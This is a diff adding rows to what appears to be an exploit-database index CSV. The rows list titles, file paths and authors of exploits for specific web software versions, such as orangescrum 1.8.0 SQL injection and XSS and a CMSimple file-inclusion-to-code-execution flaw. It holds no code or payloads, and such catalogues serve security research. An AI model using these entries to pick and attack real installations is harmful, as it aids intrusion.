 47634,exploits/hardware/webapps/47634.txt,"Prima Access Control 2.3.35 - Arbitrary File Upload",1970-01-01,LiquidWorm,webapps,hardware,
 47635,exploits/jsp/webapps/47635.rb,"Atlassian Confluence 6.15.1 - Directory Traversal (Metasploit)",1970-01-01,max7253,webapps,jsp,
@@ -44641,3 +44640,7 @@ id,file,description,date,author,type,platform,port
 50544,exploits/multiple/webapps/50544.txt,"FLEX 1085 Web 1.6.0 - HTML Injection",1970-01-01,"Mr Empy",webapps,multiple,
 50547,exploits/php/webapps/50547.py,"CMSimple 5.4 - Local file inclusion (LFI) to Remote code execution (RCE) (Authenticated)",1970-01-01,S1lv3r,webapps,php,
 50548,exploits/multiple/webapps/50548.txt,"Bagisto 1.3.3 - Client-Side Template Injection",1970-01-01,"Mohamed Abdellatif Jaber",webapps,multiple,
+50551,exploits/multiple/webapps/50551.txt,"orangescrum 1.8.0 - Privilege escalation (Authenticated)",1970-01-01,"Hubert Wojciechowski",webapps,multiple,
+50553,exploits/multiple/webapps/50553.txt,"orangescrum 1.8.0 - 'Multiple' SQL Injection (Authenticated)",1970-01-01,"Hubert Wojciechowski",webapps,multiple,
+50554,exploits/multiple/webapps/50554.txt,"orangescrum 1.8.0 - 'Multiple' Cross-Site Scripting (XSS) (Authenticated)",1970-01-01,"Hubert Wojciechowski",webapps,multiple,
+50555,exploits/php/webapps/50555.txt,"opencart 3.0.3.8 - Sessjion Injection",1970-01-01,"Hubert Wojciechowski",webapps,php,